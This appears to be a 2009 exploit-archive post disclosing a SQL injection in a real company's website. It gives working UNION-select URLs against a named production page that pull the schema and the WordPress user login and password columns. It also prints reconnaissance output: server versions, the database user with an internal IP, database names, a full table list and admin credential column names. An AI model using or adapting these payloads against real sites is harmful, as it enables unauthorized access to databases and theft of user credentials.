www.rackspace.com suffered from a remote SQL injection vulnerability.
f7265e670f795c1d66f8ad62df52f964db75311a6728c1c1d0d37c1b17ec0a53
--------------------------------------------------------------------------------------------------------------------------
[+] www.rackspace.com SQL Injection vulnerability
[+] Found By: Rohit Bansal [ SCHAP Security http://schap.org ]
[+] Date: 01-08-2009
----------------------------------------------------------------------------------------------------------------------------
http://www.rackspace.com/information/mediacenter/award.php?id=-99+uNion+Select+1,2,concat<http://www.rackspace.com/information/mediacenter/award.php?id=-101+uNion+Select+1,2,concat>
(table_schema,table_name),4%20FROM%20information_schema.tables%20--
http://www.rackspace.com/information/mediacenter/award.php?id=-99+uNion+Select+1,2,concat<http://www.rackspace.com/information/mediacenter/award.php?id=-101+uNion+Select+1,2,concat>
(user_login,user_pass),4%20FROM%20rscom.wp_users%20--
Host Information
Server = Apache/2.0.52 (Red Hat)
Version = 5.0.77-log
Powered by = PHP/5.1.6
Attack Type = SQL Union Injection
Current User = rscom@10.100.100.20
Current Database = rscom
Supports Union = yes
Union Columns = 4
Url| http://www.rackspace.com/information/mediacenter/award.php?id=101
Vuln:
http://www.rackspace.com/information/mediacenter/award.php?id=101+and+1=0+Union
Select 1 ,2, UNHEX(HEX([visible])) ,4
Comment: --
Visible Column: 3
Database:rscom
information_schema
rscom
rscom_dev
test
Tables:pp_admin
jboss_auth
jboss_users
pp_admin
pp_commission_type
pp_contact
pp_contact_email
pp_contact_phone
pp_contact_type
pp_contract_type
pp_employee
pp_notes
pp_partner
pp_partner_auth
pp_partner_exclusivity
pp_partner_info
pp_partner_referredcustomer
pp_partner_service
pp_phone_type
pp_service_type
pp_status_type
pp_w9_type
rackspace_agendas
rackspace_agendas_data
rackspace_agendas_data_types
rackspace_agendas_notes
rackspace_agendas_participants
rackspace_bizspark
rackspace_club
rackspace_conference_attendees
rackspace_conference_auth
rackspace_copyrightnotices
rackspace_customerbriefing
rackspace_december8months
rackspace_leaders
rackspace_leaders_avatars
rackspace_logorequests
rackspace_loophole
rackspace_me_calculator
rackspace_newsarticles
rackspace_partners
rackspace_partners_questions
rackspace_partners_questions_options
rackspace_partners_reps
rackspace_pressreleases
rackspace_search
rackspace_search_sidebar
rackspace_settings
rackspace_sitesubmissions
rackspace_survey
rackspace_survey_results
rackspaceipo_auth
rackspaceipo_content
rackspaceipo_effectiveness_types
rackspaceipo_fwprospectus
rackspaceipo_notices
rackspaceipo_prospectus
rackspaceipo_status_types
rackspacestore_accounts
rackspacestore_agreements
rackspacestore_options
rackspacestore_options_dependants
rackspacestore_options_types
rackspacestore_options_values
rackspacestore_orders
rackspacestore_payments
rackspacestore_payments_types
rackspacestore_products
rackspacestore_settings
rackspacestore_shared_orders_options
rackspacestore_shared_products_options
rackspacestore_shared_products_specs
rackspacestore_specs
rackspacestore_specs_types
rc_events
rc_sitesubmissions
ror_cities
ror_followup
ror_registrants
ror_registrants_rackers
vendor_auth
vgb_baskets
vgb_images
wp_2_comments
wp_2_comments_revver
wp_2_links
wp_2_options
wp_2_postmeta
wp_2_posts
wp_2_posts_revver
wp_2_term_relationships
wp_2_term_taxonomy
wp_2_terms
wp_2_usermeta
wp_2_users
wp_auth
wp_comments
wp_comments_revver
wp_links
wp_options
wp_postmeta
wp_posts
wp_posts_revver
wp_term_relationships
wp_term_taxonomy
wp_terms
wp_usermeta
wp_users
Columns: Table pp_admin
admin_username
admin_password
--------------------------------------------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] Schap.org, Infysec, Evilfinger
-------------------------------------------------------------------------------------------------------------------------
--
"You only get smarter, by playing a smarter opponent !"